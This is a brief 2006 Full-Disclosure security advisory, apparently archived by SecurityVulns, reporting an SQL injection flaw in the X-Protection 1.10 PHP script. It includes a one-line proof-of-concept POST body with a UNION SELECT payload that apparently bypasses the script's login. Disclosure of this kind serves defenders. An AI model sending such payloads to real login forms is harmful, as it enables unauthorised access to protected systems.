[Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability

2006-08-02T00:00:00
ID SECURITYVULNS:DOC:13723
Type securityvulns
Reporter Securityvulns
Modified 2006-08-02T00:00:00

Description

Discovered by Sirdarckcat from elhacker.net

X-Protection 1.10 http://members.lycos.co.uk/xscripts03/ ==============================================

X-Protection is a simple script made for protectiong files with a simple file inclusion.

There is a SQL injection vulnerability.

==============================================

PoC: http://www.server.com/protect.php

POST: username='/&password=/%20AND%201=0%20UNION%20SELECT%20999/*

==============================================

Att. Sirdarckcat elhacker.net

-- Att. SirDarckCat@GMail.com

http://www.google.com/search?q=sirdarckcat